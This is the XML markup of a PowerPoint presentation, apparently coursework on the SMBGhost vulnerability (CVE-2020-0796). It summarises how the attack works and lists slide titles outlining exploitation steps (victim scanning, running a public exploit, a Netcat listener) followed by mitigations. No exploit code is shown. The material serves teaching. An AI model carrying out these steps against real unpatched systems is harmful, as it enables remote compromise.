              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46066DE0-A760-4AC2-A66C-D39E33697295}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="50000"/>
          </a:blip>
          <a:srcRect t="1310" b="14420"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="1"/>
            <a:ext cx="12191980" cy="6857999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2257BBFD-FF10-4EB9-B8D1-1868C22A4B31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419198" y="510039"/>
            <a:ext cx="6379587" cy="1194036"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="57150">
              <a:bevelT w="38100" h="38100" prst="slope"/>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="10800000" algn="r" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="40000"/>
                    </a:prstClr>
                  </a:outerShdw>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="Gill Sans Nova"/>
              </a:rPr>
              <a:t>Literature Review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1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87EC24-649B-4576-BA83-38CDEE1C4279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4163683" y="1633268"/>
            <a:ext cx="714267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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>This attack can be carried out not only on the server, but also on the clients.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>An attacker sets up a rogue SMBv3 server and convinces a user to connect to it to exploit the vulnerability against clients.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The attacker, on the other hand, would send a specially crafted packet to an SMBv3 server to carry out the attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The attack vector is Network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>No privilege required for this attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>No specific access requirements for this attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The complexity is low.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>There could be a complete loss of confidentiality.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A complete loss of integrity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>There could be a complete loss of availability. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9808B8D7-20A3-4CE6-A637-27A10ED1B77D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195532" y="5687682"/>
            <a:ext cx="87241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4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"SMBGHOST (CVE-2020-0796) REMOTE CODE EXECUTION PROOF OF CONCEPT - ITC Secure | Cyber Advisory &amp; Managed Security Services", ITC Secure | Cyber Advisory &amp; Managed Security Services, 2021. [Online]. Available: https://itcsecure.com/smbghost-cve-2020-0796-remotecode-execution-proof-of-concept/ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46202910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72A30AD8655D4F99E1677AA9090740" ma:contentTypeVersion="8" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="fb5d1d5976e5f9c586eb37d2bb06ee1b">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="bc9785a2-8258-4159-b181-9aed535c8b4a" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="b7390ca2cfe505e404b2552febfb7cc7" ns3:_="">
    <xsd:import namespace="bc9785a2-8258-4159-b181-9aed535c8b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9785a2-8258-4159-b181-9aed535c8b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E6AF5E-BC2D-4ED2-AA64-DFBD0474F8B1}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="bc9785a2-8258-4159-b181-9aed535c8b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1C3911-26DC-4CB9-A07C-F25136FAAE7F}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{FC8C5077-0D70-41D5-B3A1-F3B7A46B3EEA}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="bc9785a2-8258-4159-b181-9aed535c8b4a"/>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919</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>92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Gill Sans Nova</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>CVE-2020-0796</vt:lpstr>
      <vt:lpstr>PRESENTED BY</vt:lpstr>
      <vt:lpstr>INTRODUCTION</vt:lpstr>
      <vt:lpstr>What is Corona Blue ?</vt:lpstr>
      <vt:lpstr>What is a Vulnerability ?</vt:lpstr>
      <vt:lpstr>What is an Exploit</vt:lpstr>
      <vt:lpstr>Literature Review</vt:lpstr>
      <vt:lpstr>Literature Review</vt:lpstr>
      <vt:lpstr>Literature Review</vt:lpstr>
      <vt:lpstr>Exploitation and Results</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>STEP 01</vt:lpstr>
      <vt:lpstr>STEP 02 : Scan the victim for Vulnerability</vt:lpstr>
      <vt:lpstr>STEP 03: Remote code execution POC with          ZecOps exploit code.</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>STEP 05 : Updating the relevant fields of exploit with retrieved offsets.</vt:lpstr>
      <vt:lpstr>STEP 06 : Setting up the Netcat listener.</vt:lpstr>
      <vt:lpstr>STEP 07 : Executing the exploit</vt:lpstr>
      <vt:lpstr>Executing the exploit in a windows system</vt:lpstr>
      <vt:lpstr>Result</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>MITIGATIONS</vt:lpstr>
      <vt:lpstr>MITIGATIONS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Senarathne G.N.S. it20647346</dc:creator>
  <cp:lastModifiedBy>Senarathne G.N.S. it20647346</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-14T04:58:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-07T02:59:37Z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0x0101002F72A30AD8655D4F99E1677AA9090740</vt:lpwstr>
  </property>
</Properties>
</file>